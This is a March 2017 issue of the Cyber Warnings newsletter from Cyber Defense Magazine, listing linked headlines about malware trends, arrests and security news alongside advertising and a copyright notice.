Cyber Warnings E-Magazine March 2017

Sample Sponsors:

To learn more about us, visit us online at http://www.cyberdefensemagazine.com/

Don't Miss Out on a Great Advertising Opportunity.
Join the INFOSEC INNOVATORS MARKETPLACE:
First-come-first-serve pre-paid placement
One Year Commitment starting at only $199
Five Year Commitment starting at only $499
http://www.cyberdefensemagazine.com/infosec-innovators-marketplace

Now Includes:
Your Graphic or Logo
Page-over Popup with More Information
Hyperlink to your website
BEST HIGH TRAFFIC OPPORTUNITY FOR INFOSEC INNOVATORS

Email: marketing@cyberdefensemagazine.com for more information.

Cyber Warnings Newsflash for March 2017
Highlights of CYBER CRIME and CYBER WARFARE Global News Clippings

Here is a summary of this month's cyber security news. Get ready to read on and click the links
below the titles to read the full stories. Find those of interest to you and read on through your
favorite web browser.

Nokia Study: Smartphone Malware Spiked 400% in '16

http://www.investopedia.com/news/nokia-study-smartphone-malware-spiked-400-16/

Emerging APAC markets more prone to malware

http://www.computerweekly.com/news/450415574/Emerging-APAC-markets-more-prone-to-malware

RogueKillerCMD is a command line malware hunter

https://betanews.com/2017/03/29/roguekillercmd-is-a-command-line-malware-hunter/

Industrial facilities infected with malware 3,000 times a year

http://fuelfix.com/blog/2017/03/23/industrial-facilities-infected-with-malware-3000-times-a-year-researchers-say/

Russian Hacker Admits Committing PC Fraud with Citadel Malware Kit

http://www.spamfighter.com/News-20824-Russian-Hacker-Admits-Committing-PC-Fraud-with-Citadel-Malware-Kit.htm

MALWARE THAT TARGETS BOTH MICROSOFT, APPLE OPERATING SYSTEMS FOUND

https://threatpost.com/malware-that-targets-both-microsoft-apple-operating-systems-found/124531/

Malware finds unwitting ally in GitHub

http://www.infoworld.com/article/3184399/security/malware-finds-unwitting-ally-in-github.html

Cyber Criminals Spread Malware by Using Fake Telecom Stations

http://www.spamfighter.com/News-20820-Cyber-Criminals-Spread-Malware-by-Using-Fake-Telecom-Stations.htm

Evil Malware Turns Antivirus Software Against PCs

http://www.laptopmag.com/articles/double-agent-malware-antivirus

Stingray for criminals: spreading mobile malware with fake cellphone towers

https://boingboing.net/2017/03/29/democratizing-crime.html

Russian Hacker Pleads Guilty for Role in Infamous Linux Ebury Malware

https://www.bleepingcomputer.com/news/security/russian-hacker-pleads-guilty-for-role-in-infamous-linux-ebury-malware/

Swearing Trojan malware in China heralds things to come in the U.S.

http://www.cio.com/article/3186204/security/swearing-trojan-in-china-heralds-malware-to-come-in-the-us.html

New Cross-platform Malware Attacks Both Windows and Mac OS X Computers

https://themerkle.com/new-cross-platform-malware-attacks-both-windows-and-mac-os-x-computers/

Malware 'disguised as Siemens software drills into 10 industrial plants'

https://www.theregister.co.uk/2017/03/22/malware_siemens_plc_firmware/

Google Play faces cat and mouse game with sneaky Android malware

http://www.pcworld.com/article/3184421/security/google-play-faces-cat-and-mouse-game-with-sneaky-android-malware.html

Microsoft Word macro malware automatically adapts attack techniques for macOS, Windows

http://appleinsider.com/articles/17/03/24/microsoft-word-macro-malware-automatically-adapts-attack-techniques-for-macos-windows

New MagikPOS Malware Targets Point-of-Sale Systems In US & Canada

http://www.darkreading.com/attacks-breaches/new-magikpos-malware-targets-point-of-sale-systems-in-us-and-canada-/d/d-id/1328434

Malware: the battle that doesn't end

http://www.cso.com.au/article/616861/malware-battle-doesn-t-end/

LATEST TAX SCAMS INCLUDE PHISHING LURES, MALWARE

https://threatpost.com/latest-tax-scams-include-phishing-lures-malware/124431/

Batch of Android phones reportedly shipped with malware pre-installed

http://www.wired.co.uk/article/android-phones-hiding-pre-installed-malware

FILELESS MALWARE CAMPAIGNS TIED TO SAME ATTACKER

https://threatpost.com/fileless-malware-campaigns-tied-to-same-attacker/124369/

Copyright (C) 2016, Cyber Defense Magazine, a division of STEVEN G. SAMUELS
LLC. 848 N. Rainbow Blvd. #4496, Las Vegas, NV 89107. EIN: 454-18-8465, DUNS#
078358935. All rights reserved worldwide. marketing@cyberdefensemagazine.com
Cyber Warnings is published by Cyber Defense Magazine, a division of STEVEN G.
SAMUELS LLC. Cyber Defense Magazine, CDM, Cyber Warnings, Cyber Defense Test
Labs and CDTL are Registered Trademarks of STEVEN G. SAMUELS LLC. All rights
reserved worldwide. Copyright 2016, Cyber Defense Magazine. All rights reserved.
No part of this newsletter may be used or reproduced by any means, graphic,
electronic, or mechanical, including photocopying, recording, taping or by any
information storage retrieval system without the written permission of the publisher
except in the case of brief quotations embodied in critical articles and reviews. Because
of the dynamic nature of the Internet, any Web addresses or links contained in this
newsletter may have changed since publication and may no longer be valid. The views
expressed in this work are solely those of the author and do not necessarily reflect the
views of the publisher, and the publisher hereby disclaims any responsibility for them.

Cyber Defense Magazine


848 N. Rainbow Blvd. #4496, Las Vegas, NV 89107.
EIN: 454-18-8465, DUNS# 078358935.
All rights reserved worldwide.
marketing@cyberdefensemagazine.com
www.cyberdefensemagazine.com

Cyber Defense Magazine - Cyber Warnings rev. date: 02/22/2017
